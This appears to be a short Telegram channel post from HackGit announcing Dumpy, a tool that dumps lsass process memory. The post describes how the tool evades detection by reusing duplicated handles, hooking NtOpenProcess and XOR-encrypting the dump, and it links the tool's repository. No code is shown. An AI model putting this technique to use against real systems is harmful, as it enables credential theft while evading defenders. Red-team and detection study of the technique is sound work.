Dumpy This tool dynamically calls MiniDumpWriteDump to dump | HackGit

Dumpy

This tool dynamically calls MiniDumpWriteDump to dump lsass memory content. This process is done without opening a new process handle to lsass and using DInvoke_rs to make it harder to detect its malicious behaviour.

In order to obtain a valid process handle without calling OpenProcess over lsass, all process handles in the system are analyzed using NtQuerySystemInformation, NtDuplicateObject, NtQueryObject and QueryFullProcessImageNameW.

NtOpenProcess is hooked before calling MiniDumpWriteDump to avoid the opening of a new process handle over lsass.

NTFS Transaction are used in order to xor the memory dump before storing it on disk.

Support added for both x86 and x64.

https://github.com/Kudaes/Dumpy

#lsass #dump

HackGit

🧟 20.90K
Софт, приложения

The channel was created for cybersecurity specialists. • Offensive Security. • RedTeam. • Malware Research. • BugBounty. • OSINT. • etc. Disclaimer:. t.me/hackgit/2082. Donations - Ads:. t...

Join
▲ Vote (1)

​Dumpy This tool dynamically calls MiniDumpWriteDump to dump | HackGit

Login

Dumpy This tool dynamically calls MiniDumpWriteDump to dump | HackGit